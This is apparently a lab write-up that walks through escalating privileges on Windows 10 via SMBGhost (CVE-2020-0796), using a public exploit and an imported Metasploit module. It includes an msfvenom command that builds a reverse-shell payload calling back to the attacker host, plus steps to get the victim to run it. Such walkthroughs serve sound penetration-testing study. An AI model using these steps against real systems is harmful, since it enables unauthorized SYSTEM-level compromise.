Windows 10 Privilege Escalation by Exploiting SMBGhost | CVE-2020-0796 | CoronaBlue

In my previous write-up I demonstrated about CVE-2020-0796 detection using a Python based script and an unofficial Nmap Script and then perform a Denial of Service (DoS) to my target windows 10 system.

In this article I will focus on Privilege Escalation part by exploiting SMBGhost/CVE-2020-0796/CoronaBlue.

Agenda

  • Privilege Escalation by exploiting CVE-2020-0796/SMBGhost using public exploit
  • Privilege Escalation by exploiting CVE-2020-0796/SMBGhost using external metasploit module

Resources

Public Exploit

Metasploit Module

The process by which MSF inject corresponding payload to the target system is called “Reflective DLL Injection” so this is why DLL file is needed. All the functions are written in DLL file.

corresponding MSF exploit is a post exploitation technique. that means this exploit can only be triggered. We need to put those two files [.rb and DLL] in correct folders. To find the correct folders please go through the steps mentioned.

To exploit this vuln, we need two file. One is MSF module that is written in ruby (.rb) and other one is a DLL file. I have given this two files info/download link in the resource segment above.

Note: Till date, in my updated MSF there is no module for CVE-2020-0796. I am using BackBox Linux. If your up-to date MSF has any module regarding SMBGhost then you can use that accordingly.

Disclaimer

This video is ONLY for educational & research purpose. Any misuse of the content of this video is strictly prohibited. BugTestLab or me will not be accountable for any illegal activities .

Target System

  • Windows 10 x64 bit Version 1903
  • IP: 192.168.0.107

Attacker System

  • BackBox Linux
  • IP: 192.168.0.108

Public Exploit Execution

Step 1: Open CMD using “Run As Admin” and type “whoami” for knowing current user’s privilege

Step 2: Download compiled public exploit to the target system and execute the main file [CVE-2020-0796\x64\cve-2020-0796-local.exe]. In my case I found below error of missing a dll file.

Step 3: I download the missing dll and copied to the folder in which the exe exists.

Step 5: Now executable runs smoothly and open a command prompt. To check privilege “whoami” is the command 🙂 Got the system shell

MSF module import and execution

Step 1: Copied two main file to my desktop @backbox linux

Step 2: Open metasploit and search for these keywords like “smbghost”, “cve_2020_0796” or “cve-2020-0796”. You can find the result 🙁 Please remind the exploit number which is 1937

Step 3: Check the folder structure of the .rb file in the web. That same stucture should be followed in local machine where MSF has been installed [modules/exploits/windows/local/]:

Step 4: You can find there are two different main folders (metasploit & metasploit-framework) which contain same folder path stucture [modules/exploits/windows/local/].

Step 5: Now Copy cve_2020_0796_smbghost.rb file to these two folders.

Step 6: Goto metasploit console and type “reload_all” . This command will reload all module that are present within metasploit installation folder.

I have a WARNING while reloading all plugings. If you are using Kali Linux/Parrot or other security distro in that scenario you might not get this warning.

Step 7: It seems my MSF is having some issue with AutoCheck module of MSF.

So I modified the file [/opt/metasploit/apps/pro/vendor/bundle/ruby/2.6.0/gems/metasploit-framework-4.17.92/modules/exploits/windows/local/cve_2020_0796_smbghost.rb] and just comment out this line of “AutoCheck”. That means I just exclude that line as well as functionality.

Step 8: Now when I perform reload_all again, I found it is working now and the exploit cound just got increased by 1 that is obvious with my new exploit. 1937 –> 1938

Step 9: Now it’s time to get meterpreter session first. For that I prepared an executable with meterpreter payload using msfvenom and copied that EXE to the target desktop: sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=5555 -f exe -o win10_mtrprtr.exe

Step 10: use exploit/multi/handler to get the meterpreter session. Once malicious EXE got clicked in target, a meterpreter session got established.

Step 11: Type “Shell” and check for privilege by “whoami

Step 12: Now it is time to use our newly imported MSF exploit. So first we will background our meterpreter shell and then USE our exploit.

Steps 13: We have to put only the session id as it is mainly a post exploitation.

Step 14: Now whenever I run “exploit” I experienced an error below.

Step 15: It is because till now we did not put DLL file into any MSF folder. The reason behind it is I am not aware of in which folder i need to put the DLL, so I was waiting for this kind of message. This message informed me in which folder i need to put the DLL 🙂 From the error I found, a folder called CVE-2020-0796 needs to be created within “/opt/metasploit/apps/pro/vendor/bundle/ruby/2.6.0/gems/metasploit-framework-4.17.92/data/exploits/” and the I need to paste the DLL to that folder.

Step 16: Everything is set; now “exploit” command will show its magic and open a command prompt. Just check the privilege now:

Video PoC

Conclusion

We learn a lot today. This is a good practice if you want to be a red team member/OSCP . Hope to meet you again. Till then Stay @home and stay safe.

Leave a Reply

Your email address will not be published. Required fields are marked *

Secured By miniOrange